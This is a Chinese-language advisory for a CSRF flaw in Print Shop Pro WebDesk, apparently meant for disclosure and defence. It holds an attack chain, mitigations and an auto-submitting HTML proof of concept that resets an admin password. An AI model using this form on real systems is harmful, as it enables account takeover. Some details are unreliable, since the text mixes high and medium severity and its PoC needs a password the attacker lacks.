CVE-2025-61547 Print Shop Pro WebDesk CSRF跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-61547

漏洞类型

CSRF跨站请求伪造

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

edu Business Solutions Print Shop Pro WebDesk

漏洞概述

CVE-2025-61547是Print Shop Pro WebDesk版本18.34中的一个高危跨站请求伪造(CSRF)漏洞。该漏洞存在于应用程序的所有功能模块中，由于应用程序缺乏有效的CSRF保护机制(如CSRF令牌)，导致攻击者能够利用已认证用户的会话执行未经授权的操作。攻击者可通过构造恶意请求链接或网页，诱骗已登录用户访问，从而在用户不知情的情况下执行敏感操作，包括但不限于凭据修改、用户数据更新等。该漏洞的CVSS评分为6.8，属于中等严重程度，但考虑到其可能导致凭据被篡改的实际影响，仍需及时修复。供应商已在19.76版本中修复了此问题，建议用户尽快升级到最新版本。

技术细节

该CSRF漏洞的根本原因在于Print Shop Pro WebDesk应用程序在处理用户请求时未实施有效的请求来源验证机制。正常情况下，Web应用程序应使用CSRF令牌(anti-CSRF token)来验证请求的合法性，确保请求确实来自应用程序自身的表单而非第三方恶意站点。攻击者利用此漏洞的基本原理如下：首先，攻击者创建一个包含恶意表单的网页，该表单模仿应用程序的合法请求；其次，攻击者诱使已认证用户访问该恶意页面；最后，当用户访问页面时，浏览器会自动发送带有用户会话Cookie的请求到目标应用程序，由于应用程序未验证请求来源，攻击者的恶意请求将被当作合法请求执行。在Print Shop Pro WebDesk中，攻击者可利用此漏洞修改用户凭据、变更账户设置或执行其他特权操作。CVSS向量显示该漏洞需要用户交互(UI:R)才能成功利用，攻击复杂度较高(AC:H)，但攻击者位于网络位置(AV:N)，可远程发起攻击。

攻击链分析

STEP 1

步骤1

攻击者侦察目标：收集Print Shop Pro WebDesk版本18.34的部署信息，包括认证端点和可利用的功能点

STEP 2

步骤2

攻击者制作恶意页面：构造包含自动提交表单的HTML页面，模仿应用程序的合法请求参数

STEP 3

步骤3

社会工程攻击：攻击者通过钓鱼邮件、即时消息或其他渠道诱骗已认证用户访问恶意页面

STEP 4

步骤4

浏览器自动执行：用户浏览器加载恶意页面后，自动向目标服务器发送带有用户会话Cookie的POST请求

STEP 5

步骤5

请求验证缺失：由于应用程序未验证CSRF令牌，恶意请求被当作合法请求处理并执行

STEP 6

步骤6

攻击成功：凭据修改或其他敏感操作在用户不知情的情况下完成，攻击者获得未授权访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-61547 -->
<!-- Print Shop Pro WebDesk Credential Modification -->
<html>
  <body>
    <h1>CVE-2025-61547 CSRF PoC</h1>
    <p>Print Shop Pro WebDesk v18.34 - Credential Update</p>
    
    <form action="https://target-server/WebDesk/api/user/updateCredentials" method="POST" id="csrfForm">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="newPassword" value="HackedPassword123" />
      <input type="hidden" name="confirmPassword" value="HackedPassword123" />
      <input type="hidden" name="currentPassword" value="[attacker-needs-victim-to-enter]" />
    </form>
    
    <script>
      // Auto-submit the form when page loads
      document.addEventListener('DOMContentLoaded', function() {
        document.getElementById('csrfForm').submit();
      });
    </script>
    
    <p>If you see this text, the CSRF attack failed.</p>
  </body>
</html>

<!-- Alternative: Image-based GET request PoC -->
<!--
<img src="https://target-server/WebDesk/api/settings/modify?param=value" 
     width="0" height="0" border="0">
-->

影响范围

Print Shop Pro WebDesk < 19.76

Print Shop Pro WebDesk 18.34 (受影响的已知版本)

防御指南

临时缓解措施

立即将Print Shop Pro WebDesk升级到19.76版本以消除CSRF漏洞。在无法立即升级的情况下，可采取以下临时缓解措施：1)监控应用程序日志中的异常请求模式；2)对管理员账户启用双因素认证；3)提醒用户不要点击来源不明的链接；4)配置WAF规则检测异常的跨站请求；5)限制管理员功能的访问IP范围。建议尽快完成版本升级，因为CSRF漏洞虽然需要用户交互，但成功利用后可导致严重的凭据泄露风险。